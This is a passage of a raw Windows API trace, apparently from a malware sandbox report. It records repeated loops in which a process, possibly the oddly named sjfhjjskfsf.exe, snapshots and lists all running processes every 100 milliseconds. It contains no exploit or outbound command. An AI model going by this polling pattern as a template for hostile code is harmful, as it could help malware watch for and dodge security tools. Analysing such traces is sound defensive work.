th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.671] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0219.671] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0219.671] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.672] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0219.672] Sleep (dwMilliseconds=0x64) [0219.773] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f8 [0219.775] Process32FirstW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.775] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.775] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.775] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.776] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.776] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.776] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.776] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.777] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.777] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.777] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.778] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.778] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.778] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.778] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.779] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.779] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.779] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.780] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0219.780] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.780] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.780] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.781] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.781] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.781] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0219.781] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0219.782] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.782] Process32NextW (in: hSnapshot=0x1f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0219.782] Sleep (dwMilliseconds=0x64) [0219.883] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fc [0219.885] Process32FirstW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.886] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.886] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.886] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.886] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.887] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.887] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.887] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.888] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.888] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.888] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.888] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.889] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.889] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.889] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.890] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.890] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.890] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.890] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0219.891] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.891] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.891] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.892] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.892] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.892] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0219.892] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0219.893] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.893] Process32NextW (in: hSnapshot=0x1fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0219.893] Sleep (dwMilliseconds=0x64) [0220.026] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x200 [0220.028] Process32FirstW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.028] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.028] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.029] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.029] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.029] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.030] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.030] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.030] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.030] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.031] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.031] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.031] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.032] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.032] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.032] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.032] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.033] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.033] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.033] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.034] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.034] Process32NextW (in: hSnapshot=0x200, lppe=0x18ebc4 | out: 